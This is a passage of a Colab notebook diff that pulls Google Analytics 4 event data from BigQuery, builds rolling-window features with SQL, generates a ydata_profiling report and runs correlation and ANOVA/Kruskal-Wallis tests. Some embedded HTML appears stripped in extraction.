Done.\")\n", + " else:\n", + " print(f\"{api_name} API is already enabled.\")\n", + "\n", + "def validate_gcp_region(location):\n", + " \"\"\"\n", + " Checks if the input string is a valid GCP region.\n", + " \"\"\"\n", + " location_check = !gcloud compute regions list | grep {location}\n", + " if location_check:\n", + " return True\n", + " else:\n", + " return False\n", + "\n", + "def initialize_vertex_ai(project_id, gcp_location):\n", + " \"\"\"\n", + " Initiates the Vertex AI SDK.\n", + " \"\"\"\n", + " print(f\"Initiating the Vertex AI SDK.\", end=\"\")\n", + " vertexai.init(project=project_id, location=vertex_ai_location)\n", + " print(\" - Done.\")\n", + "\n", + "def initialize_bigquery(project_id):\n", + " \"\"\"\n", + " Initializes the BigQuery client.\n", + " \"\"\"\n", + " print(\"Initiating the BigQuery Client\", end=\"\")\n", + " bq_client = bigquery.Client(project=project_id)\n", + " print(\" - Done.\")\n", + " return bq_client\n", + "\n", + "# --- Main execution block ---\n", + "authenticate_notebook()\n", + "set_project_id(project_id)\n", + "enable_api(\"bigquery.googleapis.com\") # BigQuery API\n", + "enable_api(\"aiplatform.googleapis.com\") # VertexAI API\n", + "\n", + "# Validating the provided VertexAI location\n", + "if not validate_gcp_region(vertex_ai_location):\n", + " print(f\"Invalid VertexAI location. Using default value.\")\n", + " vertex_ai_location = \"us-central1\"\n", + "\n", + "# Initializing VertexAI SDK\n", + "initialize_vertex_ai(project_id, vertex_ai_location)\n", + "\n", + "# Initializing the BQ Client\n", + "bq_client = initialize_bigquery(project_id)\n", + "\n", + "# When importing data from GA4 to BigQuery the default connector uses\n", + "# a specific naming convention for datasets and tables. Specifically\n", + "# the id of the dataset uses the GA4 property ID as a suffix and the\n", + "# table containing the GA4 events is named using the pattern\n", + "# 'events_YYYYMMDD'. Using 'events_*' as table ID allow us to query\n", + "# the right table regardless of the import date.\n", + "\n", + "dataset_id_suffix = ga4_property_id\n", + "location = \"\"\n", + "dataset_id = \"\"\n", + "table_id = \"events_*\"\n", + "\n", + "# Iterate through datasets and find the one with the matching suffix\n", + "for dataset in bq_client.list_datasets():\n", + " dataset_id = dataset.dataset_id\n", + " if dataset_id.endswith(dataset_id_suffix):\n", + " dataset_ref = bq_client.get_dataset(dataset.reference)\n", + " location = dataset_ref.location\n", + " print(f\"GA4 Dataset ID: {dataset_id}, Location: {location}\")\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + " display(Markdown(\"### Done. You can proceed to the next step.\"))\n", + " break\n", + "else:\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + " print(f\"No dataset found with ID suffix: {dataset_id_suffix}\")" + ], + "metadata": { + "id": "0fcNmQ51lx9e", + "colab": { + "base_uri": "https://localhost:8080/", + "height": 58 + }, + "outputId": "9539ceb5-bb02-4fd8-97e3-802f1d0c337e", + "cellView": "form" + }, + "execution_count": 5, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "### Done. You can proceed to the next step." + }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 3 - Importing GA4 data from BigQuery\n", + "\n", + "def run_bq_job_with_progress(bq_client: bigquery.Client,\n", + " query: str) -> bigquery.job.query.QueryJob:\n", + " \"\"\"\n", + " Runs a BigQuery job while displaying elapsed time.\n", + " \"\"\"\n", + " job = bq_client.query(query)\n", + " start = time.time()\n", + " print(\"|\", end=\"\")\n", + " count = 0\n", + " while job.running():\n", + " count += 1\n", + " # Printing the elapsed time approximately every [40 x 0.5] = 20 seconds\n", + " if count % 40 == 0:\n", + " elapsed_time = time.time() - start\n", + " minutes = str(math.floor(elapsed_time/60)).zfill(2)\n", + " seconds = str(round(elapsed_time%60)).zfill(2)\n", + " print(f\"-| {minutes}m:{seconds}s elapsed.\")\n", + " print(\"|\", end=\"\")\n", + " else:\n", + " print(\"-\",end=\"\")\n", + " # Iterating every 0.5 seconds\n", + " time.sleep(0.5)\n", + " print(\"-> Done!\")\n", + " job_duration = time.time() - start\n", + " minutes = str(math.floor(job_duration/60)).zfill(2)\n", + " seconds = str(round(job_duration%60)).zfill(2)\n", + " print(f\"The job duration was {minutes}m:{seconds}s.\")\n", + " return job\n", + "\n", + "def get_event_names() -> list:\n", + " \"\"\"\n", + " Retrieves a list of event names from a BigQuery table.\n", + " \"\"\"\n", + " global table_ref\n", + " # SQL query to fetch event names\n", + " event_list_query = f\"\"\"\n", + " SELECT DISTINCT event_name\n", + " FROM `{table_ref}`\n", + " ORDER BY event_name DESC\n", + " \"\"\"\n", + "\n", + " # Execute the query\n", + " print(f\"Retrieving the list of events from {table_ref}.\")\n", + " print(\"This takes on average less than 1 minute.\")\n", + "\n", + " job = run_bq_job_with_progress(bq_client, event_list_query)\n", + "\n", + " event_names = [row.event_name for row in job.result()]\n", + " return event_names\n", + "\n", + "def generate_events_checkboxes(confirm_target_button):\n", + " \"\"\"\n", + " Generates a list of checkboxes for the available events.\n", + " \"\"\"\n", + " global target_dropdown_widget, events_checkboxes, target\n", + " global confirm_features_button\n", + " target = target_dropdown_widget.value\n", + " if not target:\n", + " print(\"Please select a target event.\")\n", + " return\n", + "\n", + " # Clearing the output in case the confirm target button gets clicked again\n", + " clear_output(wait=True)\n", + "\n", + " output = \"\"\"\n", + " ## Events Selection\n", + "\n", + " ### Select a target event and confirm your selection.\n", + " \"\"\"\n", + "\n", + " hbox = widgets.HBox([target_dropdown_widget, confirm_target_button])\n", + " display(Markdown(output), hbox)\n", + "\n", + " events_checkboxes = []\n", + "\n", + " # Create checkboxes for event selection\n", + " for event_name in event_names:\n", + " if event_name != target:\n", + " events_checkboxes.append(\n", + " widgets.Checkbox(value=False, description=event_name, indent=False))\n", + "\n", + " confirm_features_button.on_click(process_events_data)\n", + "\n", + " grid = widgets.GridBox(events_checkboxes,\n", + " layout=widgets.Layout(\n", + " grid_template_columns=f\"repeat(3, 1fr)\"))\n", + "\n", + " output = \"\"\"\n", + " ### Select 1 or more feature events and confirm your selection.\n", + " \"\"\"\n", + "\n", + " display(Markdown(output), confirm_features_button, grid)\n", + "\n", + "def build_etl_query() -> str:\n", + " \"\"\"\n", + " Builds the ETL query to be executed in BigQuery.\n", + " \"\"\"\n", + " global table_ref, start_date, end_date, rolling_window, sampling_percent\n", + " global random_sampling, limit_rows, target, selected_events\n", + "\n", + " start_date_sql = start_date.strftime(\"%Y%m%d\")\n", + " end_date_sql = end_date.strftime(\"%Y%m%d\")\n", + "\n", + " features_with_target = [target] + selected_events\n", + "\n", + " etl_query = f\"\"\"\n", + " CREATE OR REPLACE TEMP TABLE dates_interval as (\n", + " SELECT DISTINCT\n", + " -- Select each distinct event_date as 'input_date',\n", + " -- representing the current date in the analysis\n", + " PARSE_DATE('%Y%m%d',event_date) as input_date,\n", + " -- Calculate the 'end_date' by subtracting a specified\n", + " -- interval from the 'input_date'\n", + " DATE_SUB(PARSE_DATE('%Y%m%d',event_date),\n", + " INTERVAL {rolling_window} DAY) as end_date\n", + " FROM `{table_ref}`\n", + " -- The time interval of {date_range_length} days\n", + " WHERE event_date BETWEEN '{start_date_sql}' AND '{end_date_sql}'\n", + " ORDER BY input_date DESC\n", + " );\n", + "\n", + " CREATE OR REPLACE TEMP TABLE events_users as (\n", + " SELECT DISTINCT\n", + " -- User identifier\n", + " Users.user_pseudo_id,\n", + " -- Date for which the feature is being calculated\n", + " DI.input_date as feature_date\n", + " FROM `{table_ref}` Users\n", + " CROSS JOIN dates_interval as DI\n", + " WHERE PARSE_DATE('%Y%m%d',Users.event_date)\n", + " BETWEEN DI.end_date AND DI.input_date\n", + " );\n", + " \"\"\"\n", + "\n", + " outer_join_string = \"\"\n", + " coalesce_string = \"\"\n", + "\n", + " for count, event in enumerate(features_with_target):\n", + " etl_query += f\"\"\"\n", + " CREATE OR REPLACE TEMP TABLE rolling_{event}_past_days AS (\n", + " SELECT user_pseudo_id, input_date as feature_date,\n", + " -- Number of distinct {event} events the user generated\n", + " -- in the past {rolling_window} days.\n", + " MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date,\n", + " PARSE_DATE('%Y%m%d',event_date), DAY) BETWEEN 1 AND {rolling_window}\n", + " WHEN TRUE THEN event_timestamp END))\n", + " OVER(PARTITION BY user_pseudo_id, input_date) AS {event}_past_{rolling_window}_days\n", + " FROM `{table_ref}` as E\n", + " CROSS JOIN dates_interval as DI\n", + " -- Filter events in the specified date range\n", + " WHERE PARSE_DATE('%Y%m%d',E.event_date)\n", + " BETWEEN DI.end_date AND DI.input_date\n", + " -- Consider only events of the specific type\n", + " AND event_name='{event}'\n", + " -- Grouping by user_pseudo_id and feature_date\n", + " GROUP BY user_pseudo_id, feature_date\n", + " );\n", + " \"\"\"\n", + "\n", + " coalesce_string += f\"COALESCE(T{count}.{event}_past_{rolling_window}_days,\\\n", + " 0) AS {event}_past_{rolling_window}_days,\"\n", + "\n", + " outer_join_string += f\"\"\"\n", + " FULL OUTER JOIN rolling_{event}_past_days AS T{count}\n", + " ON EUD.user_pseudo_id = T{count}.user_pseudo_id\n", + " AND EUD.feature_date = T{count}.feature_date\"\"\"\n", + "\n", + " etl_query += f\"\"\"\n", + " CREATE OR REPLACE TEMP TABLE etl_result AS (\n", + " SELECT DISTINCT\n", + " -- Date for which the features are calculated\n", + " EUD.feature_date,\n", + " -- User identifier\n", + " EUD.user_pseudo_id,\n", + " {coalesce_string}\n", + " FROM events_users AS EUD\n", + " -- This performs a full outer join, which combines all rows from both tables, including those that don't have matching values.\n", + " {outer_join_string}\n", + " -- This filters the results to include only rows where the user_pseudo_id is not null\n", + " WHERE EUD.user_pseudo_id IS NOT NULL\n", + " ); -- Ordering by the target feature\n", + "\n", + " SELECT * EXCEPT (feature_date, user_pseudo_id) FROM etl_result\n", + " TABLESAMPLE SYSTEM ({sampling_percent} PERCENT)\n", + " WHERE rand() < {random_sampling}\n", + " LIMIT {limit_rows};\n", + " \"\"\"\n", + "\n", + " return etl_query\n", + "\n", + "# Function to handle button click and build follow-up query\n", + "def process_events_data(confirm_features_button):\n", + " global table_ref, start_date, end_date, rolling_window, target\n", + " global selected_events, events_checkboxes, bqdf\n", + "\n", + " # Adding the selected features in a list\n", + " selected_events= [\n", + " checkbox.description for checkbox in events_checkboxes if checkbox.value]\n", + "\n", + " # At least an event should be selected\n", + " if not selected_events:\n", + " print(\"Please select at least one event to be used for features.\")\n", + " return\n", + "\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + " print(f\"Selected target event: {target}\")\n", + " print(f\"Selected events to be used for features: {selected_events}\")\n", + "\n", + " features_count = len(selected_events)\n", + "\n", + " # Estimating the query execution time\n", + " best_mins = round((1+features_count)*0.5) # Best case\n", + " worst_mins = 1+features_count # Worst case\n", + "\n", + " print(f\"The processing should take between {best_mins} and {worst_mins} minutes.\")\n", + "\n", + " etl_query = build_etl_query()\n", + "\n", + " # Execute the query\n", + " job = run_bq_job_with_progress(bq_client, etl_query)\n", + "\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + " print(\"Saving the results in a dataframe.\")\n", + " bqdf = job.to_dataframe(progress_bar_type='tqdm_notebook')\n", + "\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + " output_prefix = f\"\"\"\n", + " ### Data extraction and transformation completed\n", + " * Selected target event: *{target}*\n", + " * Selected {len(selected_events)} feature events that will be used for analysis:\n", + " ***{'***, ***'.join(selected_events)}***\n", + " \"\"\"\n", + " output_suffix = \"\"\"\n", + " ### You can proceed to the next step.\n", + " \"\"\"\n", + "\n", + " display(Markdown(output_prefix), Markdown(output_suffix))\n", + "\n", + "# --- Main execution block --- #\n", + "\n", + "end_date = datetime.datetime.today()\n", + "date_range_length = 30\n", + "start_date = end_date - datetime.timedelta(days=date_range_length)\n", + "rolling_window = 7\n", + "\n", + "# @markdown Because the amount of data generated by GA4 is very large\n", + "# @markdown and not ready for exploration, some data selection and aggregation\n", + "# @markdown are needed.\n", + "\n", + "# @markdown ---\n", + "# @markdown #### Filtering and Aggregating GA4 Data\n", + "# @markdown By default, only the data from the last 30 days will be used,\n", + "# @markdown aggregated using 7-days rolling windows.\n", + "# @markdown To change this setting, tick the checkbox below and select a\n", + "# @markdown different date interval and rolling window length.\n", + "\n", + "use_custom_range = False # @param {\"type\":\"boolean\"}\n", + "custom_start_date = \"2024-01-24\" # @param {\"type\":\"date\"}\n", + "custom_end_date = \"2025-01-24\" # @param {\"type\":\"date\"}\n", + "custom_rolling_window = 30 # @param {\"type\":\"integer\"}\n", + "\n", + "# @markdown The default settings will be applied regardless of the checkbox if:\n", + "# @markdown * The specified date range is smaller than the rolling window.\n", + "# @markdown * The difference between end date and start date is 1 day or less.\n", + "# @markdown * The specified rolling window value is less than 1.\n", + "# @markdown * The specified end date is in the future.\n", + "\n", + "# Converting the dates to datetime objects\n", + "custom_start_date = datetime.datetime.strptime(custom_start_date, \"%Y-%m-%d\")\n", + "custom_end_date = datetime.datetime.strptime(custom_end_date, \"%Y-%m-%d\")\n", + "custom_date_range_length = (custom_end_date - custom_start_date).days\n", + "\n", + "if use_custom_range:\n", + " try:\n", + " if custom_end_date > datetime.datetime.today():\n", + " print(\"The start date is in the future.\")\n", + " # End date in the future\n", + " raise ValueError\n", + " if custom_date_range_length <= 1:\n", + " # Range shorter than 1 day\n", + " print(\"The specified date range is less than 1 day.\")\n", + " raise ValueError\n", + " if custom_date_range_length < custom_rolling_window:\n", + " # Range shorter than the rolling window\n", + " print(\"The specified date range is shorter than the rolling window.\")\n", + " raise ValueError\n", + " if custom_rolling_window < 1:\n", + " # Rolling window too small\n", + " print(\"The specified rolling window is less than 1 day.\")\n", + " raise ValueError\n", + " start_date = custom_start_date\n", + " end_date = custom_end_date\n", + " date_range_length = custom_date_range_length\n", + " rolling_window = custom_rolling_window\n", + " except ValueError:\n", + " print(\"The specified custom date range is invalid. Using default values.\")\n", + "\n", + "print(f\"\"\"\n", + "Date range: {start_date.strftime(\"%Y-%m-%d\")} - {end_date.strftime(\"%Y-%m-%d\")}.\n", + "Date range length: {date_range_length} day{'s' if rolling_window > 1 else ''}.\n", + "Rolling window length: {rolling_window} day{'s' if rolling_window > 1 else ''}.\n", + "\"\"\")\n", + "\n", + "# @markdown ---\n", + "\n", + "# @markdown #### Event Selection\n", + "# @markdown 1. Click the ( β–Ά ) button to import the list of available events\n", + "# @markdown from BigQuery. This should take approximately 30 seconds.\n", + "# @markdown 2. When the import is complete, a drop-down menu and a\n", + "# @markdown \"Confirm Target\" button will appear. Select the target event from\n", + "# @markdown the drop-down menu and click \"Confirm Target\".\n", + "# @markdown 3. A list of checkboxes for all the remaining events will appear.\n", + "# @markdown Tick the checkboxes of the events that you want to include in the\n", + "# @markdown exploratory data analysis and click the \"Confirm Features\" button.\n", + "# @markdown 4. Wait for the execution to complete. This step should take between\n", + "# @markdown 30 and 60 seconds for each selected event (including the target).\n", + "\n", + "# Construct the full table ID\n", + "table_ref = f\"{project_id}.{dataset_id}.{table_id}\"\n", + "# The variable that will contain the target event\n", + "target = None\n", + "# Button for confirming dropdown target feature\n", + "confirm_target_button = widgets.Button(description=\"Confirm Target\")\n", + "# Button for confirming the selected features\n", + "confirm_features_button = widgets.Button(description=\"Confirm Features\")\n", + "# List that will contain the checkboxes to select the events used for features\n", + "events_checkboxes = []\n", + "# Lists containing only the selected events that will be processed as features\n", + "selected_events= []\n", + "# Sampling percent (via tablesample method)\n", + "sampling_percent = 10\n", + "# Random subsampling\n", + "random_sampling = 0.1\n", + "# Limit of rows to load in the dataframe\n", + "limit_rows = 50000\n", + "# The dataframe containing the results\n", + "bqdf = None\n", + "\n", + "event_names = get_event_names()\n", + "\n", + "time.sleep(1)\n", + "clear_output(wait=True)\n", + "\n", + "output = \"\"\"\n", + "### Events Selection\n", + "\n", + "Select a target event and confirm your selection\n", + "\"\"\"\n", + "\n", + "# Dropdown widget for target event selection\n", + "target_dropdown_widget = widgets.Dropdown(\n", + " options=event_names,\n", + " description='Target:',\n", + " disabled=False,\n", + ")\n", + "\n", + "confirm_target_button.on_click(generate_events_checkboxes)\n", + "\n", + "hbox = widgets.HBox([target_dropdown_widget, confirm_target_button])\n", + "display(Markdown(output), hbox)" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 152, + "referenced_widgets": [ + "510a3c2ce1f249c291aeaa8ea214a127", + "dd70738e3b794fff8c79a13d8dedc202", + "b1fc882904974aacaa704e8e1f871227", + "5240f36b552e48eeb8d3ddcbeaf9f004", + "f25457004bb5499aa7301831d9337ab7", + "7bea3caf6e954ec4850290f791b790db", + "b55f0d2197ef4068979e6ac7613658c1", + "c5fb7e585532423f85122c3e4d118bea", + "a7e3ea48a523462daeac82d4f5640101", + "bc83fabc3fd04f66aa62826ac7014f1f", + "dabe307bb3814c0b928f4e6afe5e8bc8", + "c2b1c7eb19aa431ab36f63e725062225", + "becaf358ea92408781b9fed526032216", + "cb59e53ee06f4cdcba6970997af52a0d", + "435c30134cab4d30b02115b45315c96f", + "cb90e799babe4000a2385a42835715dc", + "4dab22eea30f4879b69c42957bee96dc", + "158f1d53adf54c528eb0c290c1bf38a7", + "0cebc5f02aed4a96a4bc46a1123e83f2", + "069ad5938cc44d1b98c0b715c120e2fb", + "29490473f86c4224b40f1bc14dcf4126", + "d76a2a87928a4feaa388e906e3dba5c0", + "f106dfaad61d4048a9dee141dbfc70f8", + "27093f0b59604748b47e1011ade33069", + "b98edc06317d4ba68678baade932be80", + "7506fba59d244542a9f950d865375a7f", + "0860bfa9645f406e81b47285a8c5ea94", + "7e36b5eab7b74d2fac02312aec136228", + "b18c8b6f127241458d6304b8e43d0b40", + "377fb1783fae4079a4406df02b6a2840", + "09d4235a91e34e84b8b773cebc19a854", + "cd912a4adae54ba8a2c32dc01402c523", + "81fdbc9e894a4ba39f19eea43a6935f2", + "72eebc41731d4dafbd2a4528032bdf11", + "ce94c729917848e8b98b965163e4466b", + "16031519618548678483de6e12dd3245", + "09fce7da46184625a657e076f89ffbad", + "fe4d60abead4406dbac0e54e6384f787", + "fb03611950c8499a9078544ba5eeefa3", + "d1d9f57fa9fa42d797325eed00664ed8", + "2ff572bb94534bae8dfa5b61bb36adfd", + "903f3582fe194b61b062f6575cadf380", + "4da6287f1f5140228c1cbbe3e9873ea0", + "fc2e0535ede24be5a2b28ff37b307475", + "50a2eed8e87a4b3fbe4f7a31d5c54a5c", + "28580af1f9e54bbe99dd7ef9b3e1c7c0", + "f2e199b4f49d4beda16da275bad92312", + "2280d04b76b34456a3e0ebb257cbb58d", + "9e14f8ccc46a415382508d2f398801b1", + "6cc57addbbe3499fae8d82188d6cc466", + "2a36fd87b7e048ab80b41250b2444cff", + "6f80b1fdc1a645dda301f305c3fcfa3c", + "d5d5d1041afb49fba74e2010a8b517ef", + "df4a6c1954694ebd9078d2bbce331c0c", + "d6ea703fef6a40648d33940ea0533477", + "674f1b434cc248398e785c641cccf6a3", + "712af8b20d414f7eae375231b30ebf93", + "ff5753360adf4971b513dc197a10ba12", + "472b0409a6784d7e8595d430074b4976", + "fbf924f270ad49b4ae7fe6d33f3de998", + "e1869fb4d1a54d7b91db2a714bc8ab69", + "e99040a596774e35b013e07b97d59aa6", + "416e7a5741484457b37ee2cc6cb46769", + "5abc6dd6fc8a42cfac748645d7d5120d", + "f0571918d4964cb0a4e8c78b7dc5b81d", + "ee01fb5c76c6479a9764e8e8c7deeb24", + "dd9432faf01e49f7b645575d9422a4df", + "b11bbb17f64a4cb88670c3251361abc1", + "008431306c25440584e45566ef6e2ef3", + "5b64a9e9922f406f8834ebac63a09ca8", + "682288ea4e1440d3974262dfffefc51a", + "8dfc8df4b9f241cf901c3fbb86554cd8", + "68a0bbe8687e4db9b87542ef7023345f", + "70a89485f8eb4c9680ccdb6e20041f65", + "6009ba22e5134b42a48038970f8a8087", + "25374e0a7ab5466bbcedf7cf15974c4f", + "3be07a9a36c14e609506a8d2ac30439a", + "e43a24fb4e5c4fdcb39febd5fb66ab45", + "13942a8909f945c395d55f92033505ff", + "51fc19877c544160ba1f98487b04d612", + "eedd93a671824bde815adb53be8171d4", + "b02ed3fb150a4688b13ebcde50c08ffb", + "e03e968d53544e44bb8aee7f544f1bb7", + "c4e4e8e3c9d748ffb96f74c1e7d06456", + "6e467383b0df416ea690cbd818bceba2", + "f4e0a99311504204a79f48de9ec95280", + "d8fffd09966f40cd8f443d6083121fbf", + "2fa658f90da941b6a590c278c67e548e", + "32a25d57545340c18731eb25a79e8b47", + "f0da6d221d02448bba7dc60802325cfd", + "e17a16c5dc694b899e1e44f3be7583e5", + "bd92677245d34eaa9245935dd5a20932", + "4b9b4d011c1c4ccc886e6141ce25f235", + "74a8b740324c4efead37803b886a7921", + "56fcef4dc65e40e087bbb2821874af17", + "8673a30c6d5a4f419020438fd49b2859", + "346c028bf83344f6b6b4ac47d243a3f0", + "574170a8682d444abdb3a4762b7fc0e5", + "58b355bd18364678a41ca309605018a5", + "8f02fdb7148e4970b349c624f4bdf198", + "bf52704eb9744bc996a1f98bb2b1698d", + "a2855718cc134441a42da59e40da45b7", + "b49ac81502e049ff8c2306bb2b649c9b", + "46c4c21d611e4fd591fa5f7c35854240", + "c7f6a1a793f540f7b455e6e5c333e784", + "dc26ec5c563e4d8894d2e8597326a451", + "bfb1e9039ae14006b3ce1f52e37361c0", + "ee5daed831c846579888db7cdb41f7e3", + "d0c43db386bb4448a24806a0714ccb17", + "928ef0f255144240a1b45fd3a194679b", + "f74ea56fe0d54fe796367e996d53dc07", + "31921cdef333470eb225aea88a7394dc", + "d8f2e9832b6e45baa7b93905f717b586", + "eb2bf24f7c0e40bda34c4ad6ae7f4846", + "5fb2b8eb975e4bcaa4b006ab4d2666ad", + "0d045ce66ac748f39b128dbb07d244ac", + "8c61a995c73042869b1c8ce078243b1f", + "f74ee834aea648e88643a05dd42f0335", + "6fe1fe4e25ad43f1bc8835e98cca60d2", + "542b7e2ead0f43019751a18d171b1da3", + "832c5afe0b1642dbae94c245f46d7616", + "5105210c3e6b4bda8c1c09a25036dc13", + "0f551e74aa334c1ebde5254c5041ed68", + "0fc48fa623064b1cbc1f929d3e2dab5e" + ] + }, + "id": "g7mGjbOFmGy9", + "outputId": "5e97fd21-a15a-4a72-cff0-ae56720755f7", + "cellView": "form" + }, + "execution_count": 6, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "\n ### Data extraction and transformation completed\n * Selected target event: *purchase*\n * Selected 8 feature events that will be used for analysis:\n ***view_cart***, ***select_promotion***, ***scroll***, ***click***, ***add_to_wishlist***, ***add_to_cart***, ***add_shipping_info***, ***add_payment_info***\n " + }, + "metadata": {} + }, + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "\n ### You can proceed to the next step.\n " + }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 4 - Generating a data profiling report with ydata_profiling\n", + "\n", + "# @markdown ##### 1. **Data Sampling**\n", + "# @markdown Use the slider to select the maximum number of\n", + "# @markdown rows to include in the report (max 50,000). A larger sample size\n", + "# @markdown may increase processing time. Suggested value: `10000`.\n", + "max_rows = 10000 # @param {\"type\":\"slider\",\"min\":100,\"max\":50000,\"step\":100}\n", + "\n", + "# @markdown ##### 2. **Report Filename**\n", + "# @markdown You can edit this if you want a different\n", + "# @markdown filename for your data profiling report.\n", + "# @markdown Suggested value: `profiling_report`.\n", + "filename = \"profiling_report\" #@param {type:\"string\"}\n", + "\n", + "# @markdown ##### 3. **Report Generation**\n", + "# @markdown Click the ( β–Ά ) button to create the report.\n", + "\n", + "# @markdown ##### 4. **Download**\n", + "# @markdown Once the report is ready, click the\n", + "# @markdown \"Download Report\" button that will appear to save it locally.\n", + "\n", + "# Renaming the first column to highlight the fact that it's the target\n", + "target_column = f\"Target: {bqdf.columns[0]}\"\n", + "\n", + "# Subsampling (if needed)\n", + "sample = bqdf.rename(columns={bqdf.columns[0]: target_column})\n", + "if len(bqdf) > max_rows:\n", + " print(f\"\"\"\n", + " We have {len(bqdf)} rows of data.\n", + " A random sub-sampling of {max_rows} will be performed.\"\"\")\n", + " sample = sample.sample(max_rows, random_state=42)\n", + "\n", + "# Generating the profiling report for the data\n", + "profile = ProfileReport(sample, title=\"Data Profiling Report\", minimal=False)\n", + "profile.to_file(f\"{filename}.html\")\n", + "\n", + "# Clearing the output\n", + "time.sleep(1)\n", + "clear_output(wait=True)\n", + "\n", + "# Message that will be displayed above the download button\n", + "output_prefix = \"\"\"### Data Profiling Report\n", + "\n", + "To download the data profiling report, click on the button below:\"\"\"\n", + "\n", + "# Message that will be displayed after the download button is clicked\n", + "output_suffix = \"### Report downloaded. You can proceed to the next step.\"\n", + "\n", + "# Read the HTML report in binary mode, encode it to base64, and decode to a\n", + "# UTF-8 string for use in the download link.\n", + "payload = base64.b64encode(open(f\"{filename}.html\", 'rb').read()).decode('utf-8')\n", + "\n", + "# To parse markdown in HTML we use a Javascript library (marked)\n", + "marked_js_src = \"https://cdn.jsdelivr.net/npm/marked/marked.min.js\"\n", + "\n", + "# HTML code\n", + "output_html = f\"\"\"\n", + "\n", + "\n", + " \n", + " \n", + "\n", + "\n", + "
\n", + " \n", + " \n", + " \n", + "
\n", + " \n", + "\n", + "\n", + "\"\"\"\n", + "\n", + "# Creating the widget containing the HTML output that will be displayed\n", + "output = widgets.HTML(output_html)\n", + "\n", + "# Displaying the HTML output\n", + "display(output)" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 183, + "referenced_widgets": [ + "e87812f5a898469bb2bad220a6e91566", + "5340a286a5c64ae18446fa1c7510715e", + "683df473a75d436e82b07a3169bfd64c", + "05d27b17d2c245ca832a0e9fb175c62b", + "3cd8c61bb49a43f3b0978837ef9a61bd", + "e617ffc8fe64453794e00ff383adfd49", + "58117e02cbbe4013899717d9149cadbc", + "ca7d018d03b349109625155ce8565556", + "997d2eb93bc947eb915dfc965c27387e", + "f151ebf67d20449a953acbde1cf6459f", + "5e667a61dcae4b8db4d9f1aeb3903161", + "a084bafb25c94e6997ba2f4da9db1819", + "23417e1e02b746599ab7cbed74052e14", + "49540d8b789341a0a0ae2749bf93de1d", + "355ee7238d914eeeaa1cdf62ef2ab176", + "8d32e8bfc0f6412fb2c78c3293010dbe", + "4a056b5aadf94bba97a5769dfacb551a", + "685e8e59c01f42388be05608248ed424", + "04aa8a778e1047a3b1ea78144f646f0c", + "1c2bbe06d9464626bfa1b5bc84db4ab3", + "f0a889f2b51f464cab9f3308e3b63121", + "a26e9a47d91348d3b105772edeac5630", + "ea7a3a04cfb94fe98bd95a9f7966edce", + "2a58793d049444c6a53aca19c71defb6", + "f6eb1f0d931747b481c36ddfbe2a5573", + "b81f9444bef847b88c08ac0680f8f658", + "5bfbecef183049f59f51d6e7da14e834", + "311de98c10b74ea2b1ed6eed85cdafda", + "ce5fbdac783f41689d7974ce121ac2cd", + "e51720ac245a45c1bd56134aef6a2a89", + "536ff1057f0e44d9985e76d3c320c7fd", + "9d9c41199f094121b70eb561b2243654", + "7b7b0397219a4ce98149f88c274ae6fa", + "2b9bd5bb500642288f0503b10f0814d6", + "482f143bc653446780d5306130c213ab", + "80e7a46044d94f31a151a2a9c2b9820f", + "475a36c2e5c44b40987b6352c400706c", + "19aed523b1514eb69cd9c1fe84f64469", + "aa913f5069c84d689fe80109f8fd39d7", + "85d79e9483714568a13d0215acc0d4c9", + "f3216918c66b46aaaa7af39dfb4185e9", + "51e51aa2d6cc4e7bbcfd3ea3e293fd1a", + "5a6a033f4a5b4827a3e58b0b5d4413b1", + "9090416b0b974821ad5fef43b11e5dc9", + "af6f4809165243a0954794c1a5aa27c5", + "e53e43bbf7664c52a8596aa2904aa028", + "5f5fd2294c99427c8705a42d25fecdd7" + ] + }, + "id": "yDG9-Litqr_9", + "outputId": "7a749a47-39c5-4cad-adc1-fbd603ce4cbc", + "cellView": "form" + }, + "execution_count": 7, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "HTML(value='\\n\\n\\n \\n 2: # Kruskal-Wallis for 3 or more groups\n", + " h_statistic, p_value = kruskal(*groups)\n", + " summary_markdown_str += f\"* Kruskal-Wallis H-statistic with {target_variable}: {h_statistic}\\n\"\n", + " summary_markdown_str += f\"* P-value: {p_value}\\n\"\n", + " else: # ANOVA for 2 groups\n", + " f_statistic, p_value = f_oneway(*groups)\n", + " summary_markdown_str += f\"* ANOVA F-statistic with {target_variable}: {f_statistic}\\n\"\n", + " summary_markdown_str += f\"* P-value: {p_value}\\n\"\n", + " else:\n", + " # Target is numerical: Use correlation\n", + " correlation = df[col].corr(df[target_variable])\n", + " summary_markdown_str += f\"* Correlation with {target_variable}: {correlation}\\n\"\n", + "\n", + " summary_markdown_str += \"\\n\" # Add an extra newline for better readability\n", + " return summary_markdown_str\n", + "\n", + "# --- Main execution block ---\n", + "\n", + "# Initialize the output string with a heading\n", + "analysis_output = f\"## Exploratory Data Analysis – {target_column}\"\n", + "\n", + "\n", + "no_type_error = True\n", + "\n", + "# Loop through each column in the DataFrame\n", + "for count, col in enumerate(sample.columns, start=1):\n", + "\n", + "# Analyze the relationship between the current column and the target variable\n", + " try:\n", + " print(f\"Analyzing column {count}/{len(sample.columns)} - {col}\", end=\"\")\n", + " analysis_output += analyze_relationship(sample, target_column, col)\n", + " print(f\" – Done.\")\n", + " except TypeError:\n", + " print(f\" – Skipped due to TypeError.\")\n", + " no_type_error = False\n", + "\n", + "# Add correlation and covariance matrices to the output\n", + "analysis_output += \"\\n ## Correlation Matrix\\n\\n\"\n", + "analysis_output += sample.corr(numeric_only=True).to_markdown()\n", + "analysis_output += \"\\n \\n ## Covariance Matrix\\n\\n\"\n", + "analysis_output += 